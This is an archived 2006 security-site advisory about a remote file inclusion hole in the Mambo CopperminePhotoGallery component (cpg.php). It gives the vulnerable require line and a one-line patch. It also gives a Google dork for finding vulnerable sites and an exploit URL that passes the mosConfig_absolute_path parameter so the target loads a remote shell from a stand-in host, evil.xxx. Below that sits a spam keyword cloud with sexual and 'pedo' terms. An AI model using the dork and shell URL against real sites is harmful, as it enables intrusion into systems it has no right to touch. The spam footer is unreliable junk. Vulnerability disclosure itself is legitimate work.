about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive

exploits , vulnerabilities , articles , Mambo CopperminePhotoGalery Component Remote Include Vulnerability




2006-08-16 Mambo CopperminePhotoGalery Component Remote Include Vulnerability
Rated as : High Risk

###########  CopperminePhotoGallery Component ###########
Found By k1tk4t
Indonesia 
 
  This bug allows a remote atacker to execute commands via RFI

file:
cpg.php  

bug:
require
($mosConfig_absolute_path."/administrator/components/com_cpg/config.cpg.php");



path:
add in cpg.php
defined( '_VALID_MOS' ) or die( 'hacking attemp.' );

dork: inurl:com_cpg

expl:
htttp:/www.site.it/components/com_cpg/cpg.php?mosConfig_absolute_path=

http://evil.xxx/shell.txt?


thanks to

e-c-h-o
h4cky0u
milw0rm
google


securitydot.net - 2006-08-16

Advertising

Copyright 2007, SecurityDot
Sun, 08 Nov 2009 03:24:32 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
sexporn store 3.0. www.u88hao RIYASENVID www.fa360. ghirl sexporn www.led346 ghirl pedo CALL GALS Ringtong Kisah seks /search/ex Svirepyi www.bjtjce Bef /search/ex www.bjtjce www.smuss hot boobs port+7.htm Naruto sex www.388ys. pink world indian sex www.sld900 hot boobs orbithyip Key No.650 isbag.com news for c Sybase php live 21265 www.xxx.ya sexy grile www.milta1 sp-chat v2 www.zggkcd www.oo180. aiyoutan.5 simjob.cn tamil actr Girls sexy sp-chat v2 Sybase Sex vedou. koskoskos Haifa sex